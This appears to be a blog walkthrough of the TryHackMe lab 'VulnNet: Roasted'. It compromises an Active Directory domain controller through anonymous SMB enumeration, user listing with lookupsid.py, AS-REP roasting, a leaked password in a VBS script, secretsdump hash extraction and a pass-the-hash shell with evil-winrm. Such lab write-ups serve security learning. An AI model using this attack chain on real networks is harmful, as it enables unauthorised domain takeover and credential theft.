C R E A T E & D E S T R OY

VulnNet: Roasted | TryHackMe

VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing.

This is a much simpler machine, do not overthink. You can do it by following common methodologies.

Not shown: 989 filtered tcp ports (no-response)
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-22 18:48:39Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

Initial nmap response. Will start with enumerating the SMB shares.

mbmap -H -u anonymous -p ""
[+] Guest session       IP:    Name:                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                             NO ACCESS       Remote Admin
        C$                                                 NO ACCESS       Default share
        IPC$                                               READ ONLY       Remote IPC
        NETLOGON                                           NO ACCESS       Logon server share 
        SYSVOL                                             NO ACCESS       Logon server share 
        VulnNet-Business-Anonymous                         READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous                       READ ONLY       VulnNet Enterprise Sharing

We’ve got anonymous access to two folders so will download all the files and explore. There appears to be employee names, so we may be able to use them to password spray. Creating a list of potential logins from the names we collected we can use kerbrute to validate them.

└─$ ./kerbrute_linux_amd64 userenum -d vulnnet-rst.local --dc ~/Desktop/thm/vuln_roasted/users

All of them failed, so no potential usernames. Back to the drawing board.

After a lot of Googling I come across an Ippsec video where he talks about exposed IPC$ shares and an impacket tool called lookupsid.py and using our anonymous login can grab a list of users.

1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

Continuing with the impacket theme, I’ll try GetNPUsers.py to attempt to obtain hashes for the usernames and it looks like we’re able to grab a hash for t-skid

└─$ ./GetNPUsers.py vulnnet-rst.local/ -dc-ip -usersfile ~/Desktop/thm/vuln_roasted/users -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set

Using t-skid we can authenticate back to SMB and find a script named ResetPassword.vbs inside. It contains the credentials for another user and using these with crackmapexec find we can get shell access with Evil-Winrm.

rackmapexec smb -u a-whitehat -p bNdKVkjv3RR9ht
SMB    445    WIN-2BO8M1OE1M1  [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB    445    WIN-2BO8M1OE1M1  [+] vulnnet-rst.local\a-whitehat:bNdKVkjv3RR9ht (Pwn3d!)

We discover that a-whitehat is a domain admin, so since we’re on an impacket roll, let’s see what we can get from secretsdump…

/secretsdump.py VULNNET-RST.LOCAL/a-whitehat:bNdKVkjv3RR9ht@ 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)

Successfully manage to dump an NTLM hash for the administrator account so can use Evil-WinRM to Pass the Hash…

└─$ evil-winrm -i -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d 

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> 

This was a fun room in Active Directory basics and a nice tour through the amazing tools in the impacket suite.

Leave a Reply

Your email address will not be published. Required fields are marked *